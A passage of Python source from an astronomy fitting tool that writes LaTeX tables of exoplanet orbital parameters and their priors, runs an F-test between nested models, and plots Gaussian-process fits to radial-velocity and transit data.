text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.pl_a[i], obj.pl_a_err[i][0], obj.pl_a_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$a$ [au]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.fit_results.a[i], 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$m \sin i$ [$M_{\\rm jup}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.fit_results.mass[i], 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$t_{\omega}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format((float(obj.epoch) - (np.radians(obj.params.planet_params[7*i + 4])/(2*np.pi))*obj.params.planet_params[7*i + 1] ), 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.linear_trend),float(obj.param_errors.linear_trend_error[0]),float(obj.param_errors.linear_trend_error[1]) , width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.rv_quadtr),float(obj.rv_quadtr_err[0]),float(obj.rv_quadtr_err[1]) , width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.offsets[i]), obj.param_errors.offset_errors[i][0], obj.param_errors.offset_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.jitters[i]), obj.param_errors.jitter_errors[i][0], obj.param_errors.jitter_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.tra_off[i]), obj.tra_off_err[i][0], obj.tra_off_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.tra_jitt[i]), obj.tra_jitt_err[i][0], obj.tra_jitt_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.doGP == True:
if obj.gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_rot_str[i]), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.GP_rot_params[i]), obj.param_errors.GP_params_errors[i][0], obj.param_errors.GP_params_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
elif obj.gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_sho_str[i]), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.GP_sho_params[i]), obj.param_errors.GP_params_errors[i][0], obj.param_errors.GP_params_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\chi^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\chi_{\\nu}^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.reduced_chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$rms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.rms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$wrms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.wrms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$-\ln\mathcal{L}$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.loglik), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("N$_{\\rm RV}$ data", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(len(obj.fit_results.jd), width = width, precision = 0)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Epoch", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(obj.epoch, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
else:
print("asymmetric must be True or False")
return
if return_text == True:
return text
else:
table_file = open(file_name, 'w')
table_file.write(text)
table_file.close()
print("Done")
return
def latex_prior_table(obj, width = 10, precision = 2, file_name='prior_table.tex', path='./', return_text = False):
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"] == True or obj.type_fit["TTV"] == True :
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
if obj.K_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.K_norm_pr[i][0],obj.K_norm_pr[i][1],"$^2$"
elif obj.K_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.K_jeff_pr[i][0],obj.K_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.K_bound[i][0],obj.K_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
if obj.P_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.P_norm_pr[i][0],obj.P_norm_pr[i][1],"$^2$"
elif obj.P_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.P_jeff_pr[i][0],obj.P_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.P_bound[i][0],obj.P_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
if obj.e_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_norm_pr[i][0],obj.e_norm_pr[i][1],"$^2$"
elif obj.e_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_jeff_pr[i][0],obj.e_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_bound[i][0],obj.e_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
if obj.w_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.w_norm_pr[i][0],obj.w_norm_pr[i][1],"$^2$"
elif obj.w_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.w_jeff_pr[i][0],obj.w_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.w_bound[i][0],obj.w_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"] == True or obj.type_fit["TTV"] == True :
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
if obj.M0_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.M0_norm_pr[i][0],obj.M0_norm_pr[i][1],"$^2$"
elif obj.M0_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.M0_jeff_pr[i][0],obj.M0_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.M0_bound[i][0],obj.M0_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.hkl == True:
text = text + '''{0:{width}s}'''.format("$e\sin(\omega)$ ", width = 30)
for i in range(obj.npl):
if obj.e_sinw_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_sinw_norm_pr[i][0],obj.e_sinw_norm_pr[i][1],"$^2$"
elif obj.e_sinw_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_sinw_jeff_pr[i][0],obj.e_sinw_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_sinw_bound[i][0],obj.e_sinw_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e\cos(\omega)$ ", width = 30)
for i in range(obj.npl):
if obj.e_cosw_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_cosw_norm_pr[i][0],obj.e_cosw_norm_pr[i][1],"$^2$"
elif obj.e_cosw_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_cosw_jeff_pr[i][0],obj.e_cosw_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_cosw_bound[i][0],obj.e_cosw_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\lambda$ [deg]", width = 30)
for i in range(obj.npl):
if obj.lamb_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.lamb_norm_pr[i][0],obj.lamb_norm_pr[i][1],"$^2$"
elif obj.lamb_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.lamb_jeff_pr[i][0],obj.lamb_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.lamb_bound[i][0],obj.lamb_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
if obj.i_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.i_norm_pr[i][0],obj.i_norm_pr[i][1],"$^2$"
elif obj.i_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.i_jeff_pr[i][0],obj.i_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.i_bound[i][0],obj.i_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
if obj.Node_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.Node_norm_pr[i][0],obj.Node_norm_pr[i][1],"$^2$"
elif obj.Node_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.Node_jeff_pr[i][0],obj.Node_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.Node_bound[i][0],obj.Node_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
if obj.i_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.t0_norm_pr[i][0],obj.t0_norm_pr[i][1],"$^2$"
elif obj.t0_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.t0_jeff_pr[i][0],obj.t0_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.t0_bound[i][0],obj.t0_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Rp/$R_\star$", width = 30)
for i in range(obj.npl):
if obj.pl_rad_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.pl_rad_norm_pr[i][0],obj.pl_rad_norm_pr[i][1],"$^2$"
elif obj.pl_rad_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.pl_rad_jeff_pr[i][0],obj.pl_rad_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.pl_rad_bound[i][0],obj.pl_rad_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("a/$R_\star$", width = 30)
for i in range(obj.npl):
if obj.pl_a_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.pl_a_norm_pr[i][0],obj.pl_a_norm_pr[i][1],"$^2$"
elif obj.pl_a_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.pl_a_jeff_pr[i][0],obj.pl_a_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.pl_a_bound[i][0],obj.pl_a_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
i = 0
if obj.rv_lintr_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rv_lintr_norm_pr[i][0],obj.rv_lintr_norm_pr[i][1],"$^2$"
elif obj.rv_lintr_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rv_lintr_jeff_pr[i][0],obj.rv_lintr_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rv_lintr_bounds[i][0],obj.rv_lintr_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
i = 0
if obj.rv_quadtr_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rv_quadtr_norm_pr[i][0],obj.rv_quadtr_norm_pr[i][1],"$^2$"
elif obj.rv_quadtr_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rv_quadtr_jeff_pr[i][0],obj.rv_quadtr_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rv_quadtr_bounds[i][0],obj.rv_quadtr_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.rvoff_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rvoff_norm_pr[i][0],obj.rvoff_norm_pr[i][1],"$^2$"
elif obj.rvoff_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rvoff_jeff_pr[i][0],obj.rvoff_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rvoff_bounds[i][0],obj.rvoff_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.jitt_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.jitt_norm_pr[i][0],obj.jitt_norm_pr[i][1],"$^2$"
elif obj.jitt_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.jitt_jeff_pr[i][0],obj.jitt_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.jitt_bounds[i][0],obj.jitt_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.doGP == True:
if obj.gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_rot_str[i]), width = 30)
if obj.GP_rot_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.GP_rot_norm_pr[i][0],obj.GP_rot_norm_pr[i][1],"$^2$"
elif obj.GP_rot_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.GP_rot_jeff_pr[i][0],obj.GP_rot_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.GP_rot_bounds[i][0],obj.GP_rot_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_sho_str[i]), width = 30)
if obj.GP_sho_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.GP_sho_norm_pr[i][0],obj.GP_sho_norm_pr[i][1],"$^2$"
elif obj.GP_sho_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.GP_sho_jeff_pr[i][0],obj.GP_sho_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.GP_sho_bounds[i][0],obj.GP_sho_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.tra_off_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_off_norm_pr[i][0],obj.tra_off_norm_pr[i][1],"$^2$"
elif obj.tra_off_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_off_jeff_pr[i][0],obj.tra_off_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_off_bounds[i][0],obj.tra_off_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.tra_jitt_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_jitt_norm_pr[i][0],obj.tra_jitt_norm_pr[i][1],"$^2$"
elif obj.tra_jitt_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_jitt_jeff_pr[i][0],obj.tra_jitt_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_jitt_bounds[i][0],obj.tra_jitt_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.tra_doGP == True:
if obj.tra_gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.tra_GP_rot_str[i]), width = 30)
if obj.tra_GP_rot_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_GP_rot_norm_pr[i][0],obj.tra_GP_rot_norm_pr[i][1],"$^2$"
elif obj.tra_GP_rot_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_GP_rot_jeff_pr[i][0],obj.tra_GP_rot_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_GP_rot_bounds[i][0],obj.tra_GP_rot_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.tra_gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.tra_GP_sho_str[i]), width = 30)
if obj.tra_GP_sho_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_GP_sho_norm_pr[i][0],obj.tra_GP_sho_norm_pr[i][1],"$^2$"
elif obj.tra_GP_sho_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_GP_sho_jeff_pr[i][0],obj.tra_GP_sho_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_GP_sho_bounds[i][0],obj.tra_GP_sho_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
if return_text == True:
return text
else:
table_file = open(file_name, 'w')
table_file.write(text)
table_file.close()
print("Done")
return
def f_test(obj, obj2 = None, alpha = 0.01, lnL=False):
chi2 = obj.fit_results.chi2
ndata = len(obj.fit_results.jd)
par2 = obj.fit_results.mfit
# self.value_reduced_chi2.setText("%.4f"%(fit.fit_results.reduced_chi2))
#self.value_loglik.setText("%.4f"%(fit.fit_results.loglik))
# self.value_loglik.setText("%.4f"%(fit.loglik))
if obj2 == None:
obj2 = dill.copy(obj)
obj2.npl = 0
obj2.fitting()
else:
obj2 = dill.copy(obj2)
if len(obj.fit_results.jd) != len(obj2.fit_results.jd):
print("not the same data, test makes no sense")
return
chi1 = obj2.fit_results.chi2
par1 = obj2.fit_results.mfit
chi2_red = chi2/(ndata - par2)
if lnL == True:
F = 2*(obj.loglik - obj2.loglik) # in case \Delta lnL must be tested.
else:
if abs(par2-par1) > 0:
F = ((chi1 - chi2)/(par2-par1))/chi2_red # else standard f-test
else:
print("Nothing to test. The Tested model has == or < Npar. than the null model.")
return
p_value = pdf.f.sf(F, par2 - par1, ndata - par2, loc=0, scale=1)
print("""
\chi^2 null model = %s
\chi^2 tested model = %s
lnL null model = %s
lnL tested model = %s
N parametrs null model = %s
N parametrs tested model = %s
F value = %s
p-value = %s
alpha value = %s
"""%(chi1,chi2,obj.loglik,obj2.loglik,par1,par2,F,p_value,alpha))
if float(p_value) < alpha:
print("Null hypothesis rejected")
print("Probability = ", (1.0-float(p_value))*100.0,'%')
else:
print("Null hypothesis cannot be rejected")
def plot_gp(obj, curve=False):
import matplotlib.pyplot as plt
color="#ff7f0e"
colors = ['b','g','r']
x = obj.fit_results.rv_model.jd
y = obj.fit_results.rv_model.o_c
y_err = obj.fit_results.rv_model.rv_err
idset = obj.filelist.idset
if curve==True:
x_model = np.linspace(min(x), max(x), 5000) #obj.fit_results.model_jd
mu,var,std = obj.gp_model_curve
else:
x_model = x
mu,var,std = obj.gp_model_data
#print(mu[0:10])
#print(y[0:10])
for i in range(obj.filelist.ndset):
plt.errorbar(x[idset==i],y[idset==i], yerr=y_err[idset==i], fmt=".",color=colors[i], capsize=0);
plt.plot(x_model, mu, color = '0.5' );
plt.fill_between(x_model ,mu+std, mu-std, color=color, alpha=0.3, edgecolor="none")
def plot_transit_gp(obj, curve=False):
import matplotlib.pyplot as plt
color="#ff7f0e"
colors = ['b','g','r']
x = obj.tra_data_sets[0][0]
y = obj.tra_data_sets[0][1]
y_err = obj.tra_data_sets[0][2]
